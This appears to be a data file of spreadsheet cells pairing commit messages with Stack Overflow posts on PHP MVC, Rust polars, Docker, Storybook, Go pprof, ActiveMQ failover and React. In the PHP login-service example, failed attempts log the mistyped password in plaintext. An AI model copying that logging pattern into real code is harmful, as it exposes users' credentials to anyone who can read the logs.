Prerequisites: watch lectures "Global State and Singletons" and "Don't Look For Things!" from the Clean Code Talks.
Gaining access to service instances
For both the View and Controller instances (what you could call: "UI layer") to have access these services,  there are two general approaches:
You can inject the required services in the constructors of your views and controllers directly, preferably using a DI container.
Using a factory for services as a mandatory dependency for all of your views and controllers.
As you might suspect, the DI container is a lot more elegant solution (while not being the easiest for a beginner). The two libraries, that I recommend considering for this functionality would be Syfmony's standalone DependencyInjection component or Auryn.
Both the solutions using a factory and a DI container would let you also share the instances of various servers to be shared between the selected controller and view for a given request-response cycle.
Alteration of model's state
Now that you can access to the model layer in the controllers, you need to start actually using them:
public function postLogin(Request $request)
{
    $email = $request-&gt;get('email');
    $identity = $this-&gt;identification-&gt;findIdentityByEmailAddress($email);
    $this-&gt;identification-&gt;loginWithPassword(
        $identity,
        $request-&gt;get('password')
    );
}
Your controllers have a very clear task: take the user input and, based on this input, change the current state of business logic. In this example the states that are changed between are "anonymous user" and "logged in user".
Controller is not responsible for validating user's input, because that is part of business rules and controller is definitely not calling SQL queries, like what you would see here or here (please don't hate on them, they are misguided, not evil).
Showing user the state-change.
Ok, user has logged in (or failed). Now what? Said user is still unaware of it. So you need to actually produce a response and that is the responsibility of a view.
public function postLogin()
{
    $path = '/login';
    if ($this-&gt;identification-&gt;isUserLoggedIn()) {
        $path = '/dashboard';
    }
    return new RedirectResponse($path); 
}
In this case, the view produced one of two possible responses, based on the current state of model layer. For a different use-case you would have the view picking different templates to render, based on something like "current selected of article" .
The presentation layer can actually get quite elaborate, as described here: Understanding MVC Views in PHP.
But I am just making a REST API!
Of course, there are situations, when this is a overkill.
MVC is just a concrete solution for Separation of Concerns principle. MVC separates user interface from the business logic, and it in the UI it separated handling of user input and the presentation. This is crucial. While often people describe it as a "triad", it's not actually made up from three independent parts. The structure is more like this:
It means, that, when your presentation layer's logic is close to none-existent, the pragmatic approach is to keep them as single layer. It also can substantially simplify some aspects of model layer.
Using this approach the login example (for an API) can be written as:
public function postLogin(Request $request)
{
    $email = $request-&gt;get('email');
    $data = [
        'status' =&gt; 'ok',
    ];
    try {
        $identity = $this-&gt;identification-&gt;findIdentityByEmailAddress($email);
        $token = $this-&gt;identification-&gt;loginWithPassword(
            $identity,
            $request-&gt;get('password')
        );
    } catch (FailedIdentification $exception) {
        $data = [
            'status' =&gt; 'error',
            'message' =&gt; 'Login failed!',
        ]
    }
    return new JsonResponse($data);
}
While this is not sustainable, when you have complicate logic for rendering a response body, this simplification is very useful for more trivial scenarios. But be warned, this approach will become a nightmare, when attempting to use in large codebases with complex presentation logic.
How to build the model?
Since there is not a single "Model" class (as explained above), you really do not "build the model". Instead you start from making Services, which are able to perform certain methods. And then implement Domain Objects and Mappers.
An example of a service method:
In the both approaches above there was this login method for the identification service. What would it actually look like. I am using a slightly modified version of the same functionality from a library, that I wrote .. because I am lazy:
public function loginWithPassword(Identity $identity, string $password): string
{
    if ($identity-&gt;matchPassword($password) === false) {
        $this-&gt;logWrongPasswordNotice($identity, [
            'email' =&gt; $identity-&gt;getEmailAddress(),
            'key' =&gt; $password, // this is the wrong password
        ]);
        throw new PasswordMismatch;
    }
    $identity-&gt;setPassword($password);
    $this-&gt;updateIdentityOnUse($identity);
    $cookie = $this-&gt;createCookieIdentity($identity);
    $this-&gt;logger-&gt;info('login successful', [
        'input' =&gt; [
            'email' =&gt; $identity-&gt;getEmailAddress(),
        ],
        'user' =&gt; [
            'account' =&gt; $identity-&gt;getAccountId(),
            'identity' =&gt; $identity-&gt;getId(),
        ],
    ]);
    return $cookie-&gt;getToken();
}
As you can see, at this level of abstraction, there is no indication of where the data was fetched from. It might be a database, but it also might be just a mock object for testing purposes. Even the data mappers, that are actually used for it, are hidden away in the private methods of this service.
private function changeIdentityStatus(Entity\Identity $identity, int $status)
{
    $identity-&gt;setStatus($status);
    $identity-&gt;setLastUsed(time());
    $mapper = $this-&gt;mapperFactory-&gt;create(Mapper\Identity::class);
    $mapper-&gt;store($identity);
}
Ways of creating mappers
To implement an abstraction of persistence, on the most flexible approaches is to create custom data mappers.
From: PoEAA book
In practice they are implemented for interaction with specific classes or superclasses. Lets say you have Customer and Admin in your code (both inheriting from a User superclass). Both would probably end up having a separate matching mapper, since they contain different fields. But you will also end up with shared and commonly used operations. For example: updating the "last seen online" time. And instead of making the existing mappers more convoluted, the more pragmatic approach is to have a general "User Mapper", which only update that timestamp.
Some additional comments:
Database tables and model
While sometimes there is a direct 1:1:1 relationship between a database table, Domain Object, and Mapper, in larger projects it might be less common than you expect:
 - Information used by a single *Domain Object* might be mapped from different tables, while the object itself has no persistence in the database.
   *Example:* if you are generating a monthly report. This would collect information from different of tables, but there is no magical `MonthlyReport` table in the database.
 - A single *Mapper* can affect multiple tables.
   *Example:* when you are storing data from the `User` object, this *Domain Object* could contain collection of other domain objects - `Group` instances. If you alter them and store the `User`, the *Data Mapper* will have to update and/or insert entries in multiple tables.
 - Data from a single *Domain Object* is stored in more than one table.
   *Example:* in large systems (think: a medium-sized social network), it might be pragmatic to store user authentication data and often-accessed data separately from larger chunks of content, which is rarely required. In that case you might still have a single `User` class, but the information it contains would depend of whether full details were fetched.
 - For every *Domain Object* there can be more than one mapper
   *Example:* you have a news site with a shared codebased for both public-facing and the management software. But, while both interfaces use the same `Article` class, the management needs a lot more info populated in it. In this case you would have two separate mappers: "internal" and "external". Each performing different queries, or even use different databases (as in master or slave).
A view is not a template
View instances in MVC (if you are not using the MVP variation of the pattern) are responsible for the presentational logic. This means that each View will usually juggle at least a few templates. It acquires data from the Model Layer and then, based on the received information, chooses a template and sets values.
One of the benefits you gain from this is re-usability. If you create a ListView class, then, with well-written code, you can have the same class handing the presentation of user-list and comments below an article. Because they both have the same presentation logic. You just switch templates.
You can use either native PHP templates or use some third-party templating engine. There also might be some third-party libraries, which are able to fully replace View instances.
What about the old version of the answer?
The only major change is that, what is called Model in the old version, is actually a Service. The rest of the "library analogy" keeps up pretty well.
The only flaw that I see is that this would be a really strange library, because it would return you information from the book, but not let you touch the book itself, because otherwise the abstraction would start to "leak". I might have to think of a more fitting analogy.
What is the relationship between View and Controller instances?
The MVC structure is composed of two layers: ui and model. The main structures in the UI layer are views and controller.
When you are dealing with websites that use MVC design pattern, the best way is to have 1:1 relation between views and controllers. Each view represents a whole page in your website and it has a dedicated controller to handle all the incoming requests for that particular view.
For example, to represent an opened article, you would have \Application\Controller\Document and \Application\View\Document. This would contain all the main functionality for UI layer, when it comes to dealing with articles (of course you might have some XHR components that are not directly related to articles).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to figure out how to get &lt;code&gt;format!()&lt;/code&gt; to work when pulling data from a polars dataframe but am not getting the formatting/alignment. It works when passing a &lt;code&gt;String&lt;/code&gt; into &lt;code&gt;format!()&lt;/code&gt; instead of an &lt;code&gt;AnyValue&lt;/code&gt;. I am just now learning polars so I figure there is a step I am missing but am having trouble searching for it.&lt;/p&gt;
&lt;pre class="lang-rust prettyprint-override"&gt;&lt;code&gt;use chrono::prelude::*;
use polars::prelude::*;
fn main() {
    let mut df: DataFrame = df!(
        &amp;quot;name&amp;quot; =&amp;gt; [&amp;quot;Alice Archer&amp;quot;, &amp;quot;Ben Brown&amp;quot;, &amp;quot;Chloe Cooper&amp;quot;, &amp;quot;Daniel Donovan&amp;quot;],
        &amp;quot;birthdate&amp;quot; =&amp;gt; [
            NaiveDate::from_ymd_opt(1997, 1, 10).unwrap(),
            NaiveDate::from_ymd_opt(1985, 2, 15).unwrap(),
            NaiveDate::from_ymd_opt(1983, 3, 22).unwrap(),
            NaiveDate::from_ymd_opt(1981, 4, 30).unwrap(),
        ],
        &amp;quot;weight&amp;quot; =&amp;gt; [57.9, 72.5, 53.6, 83.1],  // (kg)
        &amp;quot;height&amp;quot; =&amp;gt; [1.56, 1.77, 1.65, 1.75],  // (m)
    )
    .unwrap();
    let line_new = format!(
        &amp;quot;{:&amp;lt;10}{:&amp;gt;5}&amp;quot;,
        df.column(&amp;quot;name&amp;quot;).unwrap().get(1).unwrap(),
        df.column(&amp;quot;weight&amp;quot;).unwrap().get(1).unwrap()
    );
    println!(&amp;quot;{}&amp;quot;, line_new);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Actual Output&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;&amp;quot;Ben&amp;quot;72
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Desired Output&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;&amp;quot;Ben&amp;quot;         72
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C30</t>
  </si>
  <si>
    <t>Workaround to avoid using redux and force component remount without fetching
Workaround to avoid using redux and force component remount without fetching remote api data again. Needed to use external component wrapper and also and setting key property to component to force remount and component whole lyfecycle to run again.
https://stackoverflow.com/questions/30626030/can-you-force-a-react-component-to-rerender-without-calling-setstate</t>
  </si>
  <si>
    <t xml:space="preserve">This might be on the "discussy" side, but I would really like to hear your view on this.
Previously I have often written data access classes that handled both reading and writing, which often led to poor naming, like FooIoHandler etc. The rule of thumb that classes that are hard to name probably are poorly designed suggests that this is not a good solution.
So, I have recently started splitting the data access into FooWriter and FooReader, which leads to nicer names and gives some additional flexibility, but at the same time I kind of like keeping it together, if the classes are not to big.
Is a reader/writer separation a better design, or should I combine them? If I should combine them, what the heck should I name the class?
Thanks /Erik
</t>
  </si>
  <si>
    <t>C300</t>
  </si>
  <si>
    <t>Improve web service workflow
Motivation:
-iterations on the web service were too slow
Change Explanation
-https://stackoverflow.com/questions/34865656/docker-development-workflow-for-compiled-components-in-a-docker-compose-setup
-binary is killed and reloaded in the running container</t>
  </si>
  <si>
    <t>I would do this:
Run docker-compose up but:
use a host volume for the directory of the compiled binary instead of the source
use an entrypoint that does something like
entrypoint.sh:
trap "pkill -f the_binary_name" SIGHUP
trap "exit" SIGTERM
while [[ 1 ]]; do
  ./the_binary_name;
done
Write a script to rebuild the binary, and copy it into the volume used by the service in docker-compose.yml:
# Run a container to compile and build the binary
docker run -ti -v $SOURCE:/path -v $DEST:/target some_image build_the_binary
# copy it to the host volume directory
copy $DEST/... /volume/shared/with/running/container
# signal the container
docker kill -s SIGHUP container_name
So to compile the binary you use this script, which mounts the source and a destination directory as volumes. You could skip the copy step if the $DEST is the same as the volume directory shared with the "run" container. Finally the script will signal the running container to have it kill the old process (which was running the old binary) and start the new one.
If the shared volume is making compiling in a container too slow, you could also run the compile on the host and just do the copy and signaling to have it run in a container.
This solution has the added benefit that your "runtime" image doesn't need all the dev dependencies. It could be a very lean image with just a bare OS base.</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone know of any documentation by MS or someone else that lays out the best practices for developing a 3 tier architecture in ASP.NET.  I am in the process of trying to convince my boss that the current architecture needs rethought and reworked to provide a flexible and reusable system.  I have found a lot of generic documentation that tells you at a high level the best practices as far as how to do this but little showing how you actually implement them.  I need to show him documentation as far as the advantages to using business objects versus data sets and things to that level of detail.  Any help would be appreciated.
</t>
  </si>
  <si>
    <t>C301</t>
  </si>
  <si>
    <t>There is a lot of difference in how Firefox and Chrome respond to css and js.
[ff=Firefox, c=Chrome, sw= scrollWidth ]
Key points:
sw works only when the element's
display
is not
inline
and
none
.
ff sets the
display
to
block
by default while c sets it to
inline
. 
So you would not get sw in c. If you need the element to be hidden anyways just use:
visibility:hidden
without setting the
display
for both ff and c.
If u have set the
visibility
in c, use
style.width
of the element instead of sc. This works.
If you still want to use sc on chrome also for a hidden
span
, you could use 
@AnthonyWJones answer on
Knowing how wide a text line will be in HTML for word wrap and other applications
Worked for IE7,8,9 , FF, Chrome.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am struggling to get my client to failover as I'd expect in my cluster.&lt;/p&gt;
&lt;p&gt;I am expecting that when 1 node fails my client should jump to that nodeâ€™s backup in the topology. However, what I see occur is my client jumps to another primary node instead. Sometimes I do see things behave as expected but it seems to depend on where my consumers get initially created....&lt;/p&gt;
&lt;p&gt;For example, if I have consumer A end up on broker A, and consumer B end up on broker B, then when I close broker A consumer A will just jump over to broker B instead of jumping over to its replicated backup. Then if I close broker B after restarting broker A the consumer that had previously jumped to broker B will jump back to broker A while the other consumer properly goes into the back up for broker B.&lt;/p&gt;
&lt;p&gt;I'm not sure if it will change anything or be of importance but I am using a replicated setup for HA where I have all 6 nodes just running locally with ports offset. The end goal will be 3 servers but for now this is just so I can test things out.&lt;/p&gt;
&lt;p&gt;I've also read these docs on &lt;a href="https://activemq.apache.org/components/artemis/documentation/latest/client-failover.html#reconnect-to-the-backup-server" rel="nofollow noreferrer"&gt;client failover&lt;/a&gt; which makes me think all I should have to do is add 'HA' and 'reconnectAttempts' to my connection factory URL.&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;public ActiveMQConnectionFactory activeMQConnectionFactory() throws NamingException{
    ArtemisTargetConfig config = (ArtemisTargetConfig) new InitialContext().lookup(&amp;quot;java:comp/env/bean/ArtemisConfig&amp;quot;);
    ActiveMQConnectionFactory cf = new ActiveMQConnectionFactory(&amp;quot;udp://&amp;quot; + config.getGroupAddress() + &amp;quot;:&amp;quot; + config.getGroupPort() + &amp;quot;?ha=true&amp;amp;reconnectAttempts=10&amp;quot;);
    cf.setUser(config.getUserName());
    cf.setPassword(config.getPassword());
    return cf;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The URL string above resolves into &lt;code&gt;udp://231.7.7.7:9876?ha=true&amp;amp;reconnectAttempts=10&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Here is my JmsConfig.java file.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@EnableJms
@Configuration
public class JmsConfig {
    private static final Logger LOG = LoggerFactory.getLogger(JmsConfig.class);
    private final ActiveMQConnectionFactory activeMQConnectionFactory;
    @Autowired
    public JmsConfig(
            ActiveMQConnectionFactory activeMQConnectionFactory){
        this.activeMQConnectionFactory = activeMQConnectionFactory;
    @Bean
    public CachingConnectionFactory cachingConnectionFactory() {
        return new CachingConnectionFactory(activeMQConnectionFactory);
    }
    @Bean
    public JmsTemplate jmsTemplate(CachingConnectionFactory cachingConnectionFactory) {
        JmsTemplate template = new JmsTemplate(cachingConnectionFactory);
        template.setPubSubDomain(false);
        return template;
    }
    @Bean
    public DefaultJmsListenerContainerFactory jmsListenerContainerFactory () {
        DefaultJmsListenerContainerFactory jmsListenerContainerFactory = new DefaultJmsListenerContainerFactory();
        jmsListenerContainerFactory.setConnectionFactory(activeMQConnectionFactory);
        jmsListenerContainerFactory.setSessionAcknowledgeMode(ActiveMQJMSConstants.INDIVIDUAL_ACKNOWLEDGE);
        jmsListenerContainerFactory.setPubSubDomain(false);
        MappingJackson2MessageConverter converter = new MappingJackson2MessageConverter();
        ObjectMapper objectMapper = new ObjectMapper();
        objectMapper.registerModule(new JavaTimeModule());
        converter.setObjectMapper(objectMapper);
        converter.setTargetType(MessageType.TEXT);
        converter.setTypeIdPropertyName(&amp;quot;_type&amp;quot;);
        jmsListenerContainerFactory.setCacheLevel(null);
        jmsListenerContainerFactory.setMessageConverter(converter);
        return jmsListenerContainerFactory;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is a primary and back up &lt;code&gt;broker.xml&lt;/code&gt; that I've trimmed to contain only areas I believe may be relevant.&lt;/p&gt;
&lt;p&gt;Primary1:&lt;/p&gt;
&lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;&amp;lt;name&amp;gt;localhost&amp;lt;/name&amp;gt;
&amp;lt;connectors&amp;gt;
    &amp;lt;connector name=&amp;quot;artemis&amp;quot;&amp;gt;tcp://localhost:61616&amp;lt;/connector&amp;gt;
&amp;lt;/connectors&amp;gt;
  &amp;lt;acceptors&amp;gt;
     &amp;lt;acceptor name=&amp;quot;artemis&amp;quot;&amp;gt;tcp://localhost:61616?tcpSendBufferSize=1048576;tcpReceiveBufferSize=1048576;amqpMinLargeMessageSize=102400;protocols=CORE,AMQP,STOMP,HORNETQ,MQTT,OPENWIRE;useEpoll=true;amqpCredits=1000;amqpLowCredits=300;amqpDuplicateDetection=true;supportAdvisory=false;suppressInternalManagementObjects=false 
     &amp;lt;/acceptor&amp;gt;
  &amp;lt;/acceptors&amp;gt;
  &amp;lt;cluster-user&amp;gt;cluster-admin&amp;lt;/cluster-user&amp;gt;
  &amp;lt;cluster-password&amp;gt;apassword&amp;lt;/cluster-password&amp;gt;
  &amp;lt;broadcast-groups&amp;gt;
     &amp;lt;broadcast-group name=&amp;quot;bg-group1&amp;quot;&amp;gt;
        &amp;lt;group-address&amp;gt;231.7.7.7&amp;lt;/group-address&amp;gt;
        &amp;lt;group-port&amp;gt;9876&amp;lt;/group-port&amp;gt;
        &amp;lt;broadcast-period&amp;gt;5000&amp;lt;/broadcast-period&amp;gt;
        &amp;lt;connector-ref&amp;gt;artemis&amp;lt;/connector-ref&amp;gt;
     &amp;lt;/broadcast-group&amp;gt;
  &amp;lt;/broadcast-groups&amp;gt;
  &amp;lt;discovery-groups&amp;gt;
     &amp;lt;discovery-group name=&amp;quot;dg-group1&amp;quot;&amp;gt;
        &amp;lt;group-address&amp;gt;231.7.7.7&amp;lt;/group-address&amp;gt;
        &amp;lt;group-port&amp;gt;9876&amp;lt;/group-port&amp;gt;
        &amp;lt;refresh-timeout&amp;gt;10000&amp;lt;/refresh-timeout&amp;gt;
     &amp;lt;/discovery-group&amp;gt;
  &amp;lt;/discovery-groups&amp;gt;
  &amp;lt;cluster-connections&amp;gt;
     &amp;lt;cluster-connection name=&amp;quot;my-cluster&amp;quot;&amp;gt;
        &amp;lt;connector-ref&amp;gt;artemis&amp;lt;/connector-ref&amp;gt;
        &amp;lt;message-load-balancing&amp;gt;ON_DEMAND&amp;lt;/message-load-balancing&amp;gt;
        &amp;lt;max-hops&amp;gt;1&amp;lt;/max-hops&amp;gt;
        &amp;lt;discovery-group-ref discovery-group-name=&amp;quot;dg-group1&amp;quot;/&amp;gt;
     &amp;lt;/cluster-connection&amp;gt;
  &amp;lt;/cluster-connections&amp;gt;
  &amp;lt;ha-policy&amp;gt;
     &amp;lt;replication&amp;gt;
        &amp;lt;primary&amp;gt;
           &amp;lt;vote-on-replication-failure&amp;gt;true&amp;lt;/vote-on-replication-failure&amp;gt;
           &amp;lt;check-for-active-server&amp;gt;true&amp;lt;/check-for-active-server&amp;gt;
        &amp;lt;/primary&amp;gt;
     &amp;lt;/replication&amp;gt;
  &amp;lt;/ha-policy&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Backup1:&lt;/p&gt;
&lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;&amp;lt;name&amp;gt;localhost&amp;lt;/name&amp;gt;
&amp;lt;connectors&amp;gt;
    &amp;lt;connector name=&amp;quot;artemis&amp;quot;&amp;gt;tcp://localhost:61617&amp;lt;/connector&amp;gt;
&amp;lt;/connectors&amp;gt;
  &amp;lt;acceptors&amp;gt;
     &amp;lt;!-- Acceptor for every supported protocol --&amp;gt;
     &amp;lt;acceptor name=&amp;quot;artemis&amp;quot;&amp;gt;tcp://localhost:61617?tcpSendBufferSize=1048576;tcpReceiveBufferSize=1048576;amqpMinLargeMessageSize=102400;protocols=CORE,AMQP,STOMP,HORNETQ,MQTT,OPENWIRE;useEpoll=true;amqpCredits=1000;amqpLowCredits=300;amqpDuplicateDetection=true;supportAdvisory=false;suppressInternalManagementObjects=false 
     &amp;lt;/acceptor&amp;gt;
  &amp;lt;/acceptors&amp;gt;
  &amp;lt;cluster-user&amp;gt;cluster-admin&amp;lt;/cluster-user&amp;gt;
  &amp;lt;cluster-password&amp;gt;aPassword&amp;lt;/cluster-password&amp;gt;
  &amp;lt;broadcast-groups&amp;gt;
     &amp;lt;broadcast-group name=&amp;quot;bg-group1&amp;quot;&amp;gt;
        &amp;lt;group-address&amp;gt;231.7.7.7&amp;lt;/group-address&amp;gt;
        &amp;lt;group-port&amp;gt;9876&amp;lt;/group-port&amp;gt;
        &amp;lt;broadcast-period&amp;gt;5000&amp;lt;/broadcast-period&amp;gt;
        &amp;lt;connector-ref&amp;gt;artemis&amp;lt;/connector-ref&amp;gt;
     &amp;lt;/broadcast-group&amp;gt;
  &amp;lt;/broadcast-groups&amp;gt;
  &amp;lt;discovery-groups&amp;gt;
     &amp;lt;discovery-group name=&amp;quot;dg-group1&amp;quot;&amp;gt;
        &amp;lt;group-address&amp;gt;231.7.7.7&amp;lt;/group-address&amp;gt;
        &amp;lt;group-port&amp;gt;9876&amp;lt;/group-port&amp;gt;
        &amp;lt;refresh-timeout&amp;gt;10000&amp;lt;/refresh-timeout&amp;gt;
     &amp;lt;/discovery-group&amp;gt;
  &amp;lt;/discovery-groups&amp;gt;
  &amp;lt;cluster-connections&amp;gt;
     &amp;lt;cluster-connection name=&amp;quot;my-cluster&amp;quot;&amp;gt;
        &amp;lt;connector-ref&amp;gt;artemis&amp;lt;/connector-ref&amp;gt;
        &amp;lt;message-load-balancing&amp;gt;ON_DEMAND&amp;lt;/message-load-balancing&amp;gt;
        &amp;lt;max-hops&amp;gt;1&amp;lt;/max-hops&amp;gt;
        &amp;lt;discovery-group-ref discovery-group-name=&amp;quot;dg-group1&amp;quot;/&amp;gt;
     &amp;lt;/cluster-connection&amp;gt;
  &amp;lt;/cluster-connections&amp;gt;
  &amp;lt;ha-policy&amp;gt;
     &amp;lt;replication&amp;gt;
        &amp;lt;backup&amp;gt;
          &amp;lt;allow-failback&amp;gt;true&amp;lt;/allow-failback&amp;gt;
        &amp;lt;/backup&amp;gt;
     &amp;lt;/replication&amp;gt;
  &amp;lt;/ha-policy&amp;gt;
&amp;lt;/core&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is what the 'listNetworkTopology' operation in the broker shows me&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[{&amp;quot;nodeID&amp;quot;:&amp;quot;19f26f12-ee1f-11ef-b81c-00155df5022d&amp;quot;,&amp;quot;live&amp;quot;:&amp;quot;localhost:61616&amp;quot;,&amp;quot;primary&amp;quot;:&amp;quot;localhost:61616&amp;quot;,&amp;quot;backup&amp;quot;:&amp;quot;localhost:61617&amp;quot;},
    {&amp;quot;nodeID&amp;quot;:&amp;quot;b071e7f0-ee3f-11ef-b10d-00155df5022d&amp;quot;,&amp;quot;live&amp;quot;:&amp;quot;localhost:61620&amp;quot;,&amp;quot;primary&amp;quot;:&amp;quot;localhost:61620&amp;quot;,&amp;quot;backup&amp;quot;:&amp;quot;localhost:61621&amp;quot;},
    {&amp;quot;nodeID&amp;quot;:&amp;quot;d46e2693-ee1f-11ef-9cd3-00155df5022d&amp;quot;,&amp;quot;live&amp;quot;:&amp;quot;localhost:61618&amp;quot;,&amp;quot;primary&amp;quot;:&amp;quot;localhost:61618&amp;quot;,&amp;quot;backup&amp;quot;:&amp;quot;localhost:61619&amp;quot;}]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is some additional info:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;I have confirmed that replication is working and in my primary broker logs I see AMQ221025: Replication: sending NIOSequentialFile when I boot up my backups (As well as the AMQ221031: backup announced on my backup).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I have tried entirely removing my CachedConnectionFactory.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I have tried deleting
and remaking each of my brokers just in case. (This seemed to work
for a brief period).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C302</t>
  </si>
  <si>
    <t>Add stories for previously built components (#10)
* ✨Add story for NavLink component
* 🔧 Add tailwind-css support for Storybook
https://stackoverflow.com/questions/65495912/storybook-tailwind-how-should-i-add-tailwind-to-storybook</t>
  </si>
  <si>
    <t>Storybook recommends using the @storybook/addon-postcss for customizing the postCSS config from now on (instead of relying on customizing the postcss-loader):
Add the postCSS addon to your installation
npm i -D @storybook/addon-postcss     # or
yarn add -D @storybook/addon-postcss
Create the postcss.config.js in the project root
// postcss.config.js
module.exports = {
  plugins: {
    tailwindcss: {},
    autoprefixer: {},
  }
}
Add the plugin to your .storybook/main.js
// .storybook/main.js
module.exports = {
  ...
  addons: [
    ...
    {
      name: '@storybook/addon-postcss',
      options: {
        cssLoaderOptions: {
          // When you have splitted your css over multiple files
          // and use @import('./other-styles.css')
          importLoaders: 1,
        },
        postcssLoaderOptions: {
          // When using postCSS 8
          implementation: require('postcss'),
        },
      },
    },
  ],
};
Import your css file in the .storybook/preview.js
// .storybook/preview.js
import '../src/styles.css';</t>
  </si>
  <si>
    <t xml:space="preserve">Let's say that I have a record in the database and that both admin and normal users can do updates.
Can anyone suggest a good approach/architecture on how to version control every change in this table so it's possible to roll back a record to a previous revision?
</t>
  </si>
  <si>
    <t>C303</t>
  </si>
  <si>
    <t>Wire in pprof handlers.
Based on http://stackoverflow.com/questions/19591065/profiling-go-web-application-built-with-gorillas-mux-with-net-http-pprof
Upstream-commit: 9f46779d42c9b90a70c3c434d03a4502070e1b6d
Component: engine</t>
  </si>
  <si>
    <t>Sorry for that question.  The answer is in the init() function of
pprof.  One just need to add 4 functions from pprof to the mux router.  Here is the fixed code from above.
package main
import (
    "fmt"
    "github.com/gorilla/mux"
    "math"
    "net/http"
)
import "net/http/pprof"
func AttachProfiler(router *mux.Router) {
    router.HandleFunc("/debug/pprof/", pprof.Index)
    router.HandleFunc("/debug/pprof/cmdline", pprof.Cmdline)
    router.HandleFunc("/debug/pprof/profile", pprof.Profile)
    router.HandleFunc("/debug/pprof/symbol", pprof.Symbol)
}
func SayHello(w http.ResponseWriter, r *http.Request) {
    for i := 0; i &lt; 1000000; i++ {
        math.Pow(36, 89)
    }
    fmt.Fprint(w, "Hello!")
}
func main() {
    r := mux.NewRouter()
    AttachProfiler(r)
    r.HandleFunc("/hello", SayHello)
    http.ListenAndServe(":6060", r)
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in process of researching YARP capabilities as a possible option of my API Gateway and was curious if it's possible to use environment variable directly inside configuration file.&lt;/p&gt;
&lt;p&gt;Lets say I want to have cluster destination address configurable like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;quot;Clusters&amp;quot;: {
        &amp;quot;locationsCluster&amp;quot;: {
            &amp;quot;Destinations&amp;quot;: {
                &amp;quot;destination1&amp;quot;: {
                    &amp;quot;Address&amp;quot;: &amp;quot;${SERVICE_BASE_URL}&amp;quot;
                }
            }
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I checked the documentation and didn't find anything about environment variables and if it's supported or not. If i got it correct in order to implement something similar I need to implement custom config filter &lt;a href="https://dotnet.github.io/yarp/articles/config-filters.html" rel="nofollow noreferrer"&gt;https://dotnet.github.io/yarp/articles/config-filters.html&lt;/a&gt; and to the substitute manually it would be very helpful if the support of this option would be provided out of the box...&lt;/p&gt;
&lt;p&gt;Does anyone tried to do anything like that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C304</t>
  </si>
  <si>
    <t>Fixed issue with tabs component setting native peer children to light
weight mode. http://stackoverflow.com/questions/42100508/when-showing-webbrowser-in-tab-it-turns-into-image/42107093</t>
  </si>
  <si>
    <t>This is fixed now in git.  Will be available in next server update next week.
https://github.com/codenameone/CodenameOne/commit/e17c39a6293125b4e136ed4b05fb5e20a8c3a82f</t>
  </si>
  <si>
    <t xml:space="preserve">What are the best practices and software tools for documenting software design and architecture for 
PC based applications based on Java
or .NET?
Embedded Applications based on VxWorks or Embedded Linux or Windows CE?
One tool I have in mind is [external-link]. Is it a good choice?
</t>
  </si>
  <si>
    <t>C305</t>
  </si>
  <si>
    <t>Bug fix. See comments.
Fix for Warning: Failed prop type: Invalid prop `component` of type `object` supplied to `Route`, expected `function`.
See:
https://stackoverflow.com/questions/43396818/warning-failed-prop-type-invalid-prop-component-of-type-object-supplied-to</t>
  </si>
  <si>
    <t>Simply forcing it to be a function as the prop expects get's rid of the console error even though it's not the ideal solution.
&lt;Route path='/' component={props =&gt; &lt;App {...props} /&gt;} /&gt;
https://github.com/ReactTraining/react-router/issues/6420#issuecomment-433541079</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Issue Description&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm using react-three-fiber and I have a function called &lt;code&gt;HoverableCube&lt;/code&gt; that creates a transparent, interactive cube. When clicked, it moves le camera clos to it and should have the camera face the cube.&lt;/p&gt;
&lt;p&gt;Parameters:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Parameters:
position, rotation, scale, moveTo, setLastCameraPosition, controlsRef
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;position, rotation, scale&lt;/code&gt; â†’ Define where the cube is and its size. &lt;code&gt;moveTo&lt;/code&gt; â†’ The camera moves to this 3D vector when the cube is clicked. &lt;code&gt;setLastCameraPosition&lt;/code&gt; â†’ Stores the previous camera position before moving &lt;code&gt;controlRef&lt;/code&gt; reference state for control.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;
ðŸ“Œ The camera does NOT face the cube after moving to moveTo.
No matter where the cube is, the camera always faces (0,0,0) after the GSAP transition.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What I tried&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;In my App() function:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;  const orbitRef = useRef()
